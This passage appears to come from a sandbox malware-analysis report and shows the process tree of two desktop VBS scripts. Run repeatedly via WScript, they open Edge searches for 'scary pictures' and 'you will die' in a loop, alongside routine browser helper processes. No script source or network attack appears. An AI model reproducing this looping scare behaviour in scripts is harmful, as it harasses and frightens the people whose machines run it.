"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:1
4⤵
PID:10000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11476 /prefetch:1
4⤵
PID:10108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11800 /prefetch:1
4⤵
PID:9392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11504 /prefetch:1
4⤵
PID:9912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12088 /prefetch:1
4⤵
PID:9192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12240 /prefetch:1
4⤵
PID:10036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3466331489111441533,767299457181471298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12224 /prefetch:1
4⤵
PID:10484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:2728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:4184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1420,8377286333753171108,13156690722438426570,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:3
4⤵
PID:220

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:1868

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:3324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:1856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:1252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:3552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:4460

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:3168

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:3444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:4880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:5184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:5204

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:5456

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:5472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:5520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0xd8,0x104,0xfc,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:5536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:5632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:5644

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
- Suspicious use of FindShellTrayWindow
PID:5808

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:6036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:6092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:6116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:1072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:5864

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:6020

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:6064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:6156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:6180

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:6260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:6272

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:6312

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:6528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:6548

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0xc4,0x104,0xfc,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:6568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:6632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:6652

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:6668

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:6748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:6816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:6900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:6972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:6988

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:6228

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:6344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:6820

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:6804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:7184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:7196

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:7484

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:7520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:7576

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:7596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:7700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:7712

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:9068

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:9076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:9212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:8100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=scary+pictures
3⤵
PID:9320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
PID:9332

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2.vbs"
3⤵
PID:9380

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\1.vbs"
3⤵
PID:9476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=you+will+die
3⤵
PID:9572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdb14a46f8,0x7ffdb14a4708,0x7ffdb14a4718
4⤵
